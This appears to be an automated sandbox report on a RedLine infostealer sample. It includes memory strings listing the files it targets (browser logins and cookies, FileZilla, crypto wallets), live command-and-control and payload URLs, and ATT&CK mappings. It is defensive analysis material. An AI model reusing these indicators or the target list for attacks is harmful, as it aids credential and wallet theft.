Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Il5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior

Source: Yara match	File source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	Path Interception	312 Process Injection	1 Masquerading	1 OS Credential Dumping	33 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	251 Virtualization/Sandbox Evasion	Security Account Manager	251 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	312 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	14 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Software Packing	Cached Domain Credentials	123 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
StZAEFSb2j.exe	34%	ReversingLabs	ByteCode-MSIL.Infostealer.Generic
StZAEFSb2j.exe	26%	Virustotal		Browse
StZAEFSb2j.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.aspnet_compiler.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1234943		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://tempuri.org/Endpoint/CheckConnectResponse	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettings	0%	URL Reputation	safe
http://tempuri.org/t_	0%	URL Reputation	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Endpoint/CheckConnect	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnviron	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironment	0%	URL Reputation	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	URL Reputation	safe
http://tgc8x.tk	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	0%	URL Reputation	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	URL Reputation	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	URL Reputation	safe
https://tgc8x.tk/tt/BLACKDEV.txt	100%	Avira URL Cloud	phishing
https://tgc8x.tk4	0%	Avira URL Cloud	safe
http://tempuri.org/0	0%	URL Reputation	safe
https://tgc8x.tkD8	0%	Avira URL Cloud	safe
http://194.55.186.201:6008	0%	Avira URL Cloud	safe
194.55.186.201:6008	0%	Avira URL Cloud	safe
http://194.55.186.201:	0%	Avira URL Cloud	safe
https://tgc8x.tk/tt/lamb.txt	100%	Avira URL Cloud	phishing
https://tgc8x.tk	0%	Avira URL Cloud	safe
http://194.55.186.201:6008/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tgc8x.tk	50.115.174.192	true	true		unknown
api.ip.sb	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tgc8x.tk/tt/BLACKDEV.txt	true	Avira URL Cloud: phishing	unknown
194.55.186.201:6008	true	Avira URL Cloud: safe	unknown
https://tgc8x.tk/tt/lamb.txt	true	Avira URL Cloud: phishing	unknown
http://194.55.186.201:6008/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	false		high
https://duckduckgo.com/ac/?q=	tmpE2D.tmp.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.datacontract.org/2004/07/	aspnet_compiler.exe, 00000001.00000002.416441450.000000000309B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/t_	aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://search.yahoo.com?fr=crmas_sfpf	aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpE2D.tmp.1.dr	false		high
http://schemas.xmlsoap.org/soap/envelope/D	aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	false		high
http://ns.adobe.c/g	aspnet_compiler.exe, 00000001.00000003.412663066.0000000008CB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412625368.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412575103.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.402236725.0000000008CA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412702825.000000000152D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tgc8x.tk4	StZAEFSb2j.exe, 00000000.00000002.320562361.0000000002B54000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnviron	aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	false		high
http://tempuri.org/Endpoint/SetEnvironment	aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tgc8x.tk	StZAEFSb2j.exe, 00000000.00000002.320604810.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tgc8x.tkD8	StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.55.186.201:6008	aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415687042.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpE2D.tmp.1.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr	false		high
https://api.ipify.orgcookies//settinString.Removeg	StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://194.55.186.201:	aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/0	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tgc8x.tk	StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpE2D.tmp.1.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.115.174.192	tgc8x.tk	United States		32875	VIRPUS	true
194.55.186.201	unknown	Germany		39855	MOD-EUNL	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736967
Start date and time:	2022-11-03 12:43:40 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	StZAEFSb2j.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/26@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 51 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:44:40	API Interceptor	1x Sleep call for process: StZAEFSb2j.exe modified
12:45:08	API Interceptor	74x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
50.115.174.192	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse
	CnptEaXHK7.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	RFQ# 6000163267.js	Get hash	malicious	Browse
	WY220353098B.js	Get hash	malicious	Browse
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse
	vNrvIu0ujD.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	img664947593034645.exe	Get hash	malicious	Browse
	africa.exe	Get hash	malicious	Browse
	Ziraat Bankas Swift Mesaj.exe	Get hash	malicious	Browse
	RFQ.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tgc8x.tk	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse	50.115.174.192
	CnptEaXHK7.exe	Get hash	malicious	Browse	50.115.174.192
	PO.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ# 6000163267.js	Get hash	malicious	Browse	50.115.174.192
	WY220353098B.js	Get hash	malicious	Browse	50.115.174.192
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse	50.115.174.192
	vNrvIu0ujD.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	img664947593034645.exe	Get hash	malicious	Browse	50.115.174.192
	africa.exe	Get hash	malicious	Browse	50.115.174.192
	Ziraat Bankas Swift Mesaj.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ.exe	Get hash	malicious	Browse	50.115.174.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VIRPUS	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse	50.115.174.192
	CnptEaXHK7.exe	Get hash	malicious	Browse	50.115.174.192
	PO.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ# 6000163267.js	Get hash	malicious	Browse	50.115.174.192
	WY220353098B.js	Get hash	malicious	Browse	50.115.174.192
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse	50.115.174.192
	vNrvIu0ujD.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	img664947593034645.exe	Get hash	malicious	Browse	50.115.174.192
	africa.exe	Get hash	malicious	Browse	50.115.174.192
	Ziraat Bankas Swift Mesaj.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ.exe	Get hash	malicious	Browse	50.115.174.192

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	rzN2ckYW24.exe	Get hash	malicious	Browse	50.115.174.192
	Scan_Document_xls.exe	Get hash	malicious	Browse	50.115.174.192
	Remittance copy.exe	Get hash	malicious	Browse	50.115.174.192
	3qXE1Bpn92.exe	Get hash	malicious	Browse	50.115.174.192
	0Eot6HTp2y.exe	Get hash	malicious	Browse	50.115.174.192
	SecuriteInfo.com.Heur.MSIL.Bladabindi.1.28850.7667.exe	Get hash	malicious	Browse	50.115.174.192
	payment copy.exe	Get hash	malicious	Browse	50.115.174.192
	Payment copy.exe	Get hash	malicious	Browse	50.115.174.192
	SHIPPING DOC.exe	Get hash	malicious	Browse	50.115.174.192
	Payment advice.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ103122-WOLF MACHINE INC.exe	Get hash	malicious	Browse	50.115.174.192
	New PO.exe	Get hash	malicious	Browse	50.115.174.192
	SecuriteInfo.com.Variant.Fragtor.155590.23683.28000.exe	Get hash	malicious	Browse	50.115.174.192
	payment copy.exe	Get hash	malicious	Browse	50.115.174.192
	KWIIR00322677.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	WELTER zahnrad GmbH Urgent enquiry Order nr543.exe	Get hash	malicious	Browse	50.115.174.192
	WIRE SWIFT COPY.exe	Get hash	malicious	Browse	50.115.174.192
	Gestempelte ge#U00e4nderte Bestellung.exe	Get hash	malicious	Browse	50.115.174.192
	October SOA.exe	Get hash	malicious	Browse	50.115.174.192

Process:	C:\Users\user\Desktop\StZAEFSb2j.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.35816127824051
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
MD5:	31E089E21A2AEB18A2A23D3E61EB2167
SHA1:	E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
